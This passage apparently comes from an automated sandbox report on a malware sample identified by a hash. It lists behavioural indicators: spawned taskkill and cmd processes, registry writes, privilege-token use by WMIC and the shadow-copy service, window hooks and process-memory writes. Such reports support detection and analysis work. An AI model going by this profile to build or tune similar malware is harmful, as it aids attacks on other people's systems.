4636	taskkill.exe
4484	taskkill.exe
2812	taskkill.exe
2988	taskkill.exe
1620	taskkill.exe
4104	taskkill.exe
996	taskkill.exe
1896	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

SearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

Processes:

SearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

pid	process
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

Suspicious use of AdjustPrivilegeToken 35 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	3448	taskkill.exe
Token: SeDebugPrivilege	2988	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	4484	taskkill.exe
Token: SeDebugPrivilege	2812	taskkill.exe
Token: SeDebugPrivilege	4488	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3288	WMIC.exe
Token: SeSecurityPrivilege	3288	WMIC.exe
Token: SeTakeOwnershipPrivilege	3288	WMIC.exe
Token: SeLoadDriverPrivilege	3288	WMIC.exe
Token: SeSystemProfilePrivilege	3288	WMIC.exe
Token: SeSystemtimePrivilege	3288	WMIC.exe
Token: SeProfSingleProcessPrivilege	3288	WMIC.exe
Token: SeIncBasePriorityPrivilege	3288	WMIC.exe
Token: SeCreatePagefilePrivilege	3288	WMIC.exe
Token: SeBackupPrivilege	3288	WMIC.exe
Token: SeRestorePrivilege	3288	WMIC.exe
Token: SeShutdownPrivilege	3288	WMIC.exe
Token: SeDebugPrivilege	3288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3288	WMIC.exe
Token: SeRemoteShutdownPrivilege	3288	WMIC.exe
Token: SeUndockPrivilege	3288	WMIC.exe
Token: SeManageVolumePrivilege	3288	WMIC.exe
Token: 33	3288	WMIC.exe
Token: 34	3288	WMIC.exe
Token: 35	3288	WMIC.exe
Token: 36	3288	WMIC.exe
Token: SeBackupPrivilege	2072	vssvc.exe
Token: SeRestorePrivilege	2072	vssvc.exe
Token: SeAuditPrivilege	2072	vssvc.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

SearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

pid process

2944 SearchApp.exe
3408 SearchApp.exe
2904 SearchApp.exe
1744 SearchApp.exe
4744 SearchApp.exe

pid	process
2944	SearchApp.exe
3408	SearchApp.exe
2904	SearchApp.exe
1744	SearchApp.exe
4744	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1104 wrote to memory of 1232	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1232	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 1232	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1232 wrote to memory of 3148	1232	cmd.exe	cmd.exe
PID 1232 wrote to memory of 3148	1232	cmd.exe	cmd.exe
PID 1104 wrote to memory of 4488	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 4488	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 1104 wrote to memory of 4488	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
PID 4488 wrote to memory of 3340	4488	cmd.exe	cmd.exe
PID 4488 wrote to memory of 3340	4488	cmd.exe	cmd.exe
PID 3340 wrote to memory of 4636	3340	cmd.exe	taskkill.exe
PID 3340 wrote to memory of 4636	3340	cmd.exe	taskkill.exe
PID 1104 wrote to memory of 1752	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	cmd.exe
